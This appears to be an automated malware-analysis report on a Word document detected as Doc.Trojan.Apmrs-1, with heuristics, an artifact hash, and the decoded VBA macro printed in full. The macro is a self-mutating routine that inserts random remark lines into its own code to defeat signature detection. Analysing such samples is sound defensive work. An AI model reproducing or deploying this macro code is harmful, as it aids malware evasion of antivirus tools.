MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The file is identified as malicious by ClamAV and contains VBA macros. The macro code itself appears to be designed for obfuscation, inserting random remark statements to increase its size and complexity. No direct malicious actions like downloading payloads or establishing persistence were observed in the provided script, leading to a moderate confidence level.
Heuristics 2
-
ClamAV: Doc.Trojan.Apmrs-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Apmrs-1
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 994 bytes |
SHA-256: f63b83b66fa891cd8515a709d7bcf4892f4ab79d6d80678aa17cec8069e17d7c |
|||
|
Detection
ClamAV:
Doc.Trojan.Apmrs-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "APMRS"
Sub AdvancedPolymorphicMacroReplicationSystem()
On Error Resume Next
Application.ScreenUpdating = False
Set Current = MacroContainer
For Grow = 1 To 20
Number = Current.VBProject.VBComponents("APMRS").CodeModule.ProcCountLines("AdvancedPolymorphicMacroReplicationSystem", vbext_pk_Proc)
RandomLine = Int(Rnd() * Number + 1)
RemarkLength = Int(Rnd() * 40 + 1)
For Length = 1 To RemarkLength
Remark = Remark + Chr$(Int((90 - 65 + 1) * Rnd + 65))
Next Length
Current.VBProject.VBComponents("APMRS").CodeModule.InsertLines RandomLine, vbTab & "Rem " & Remark
Remark = ""
Next Grow
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.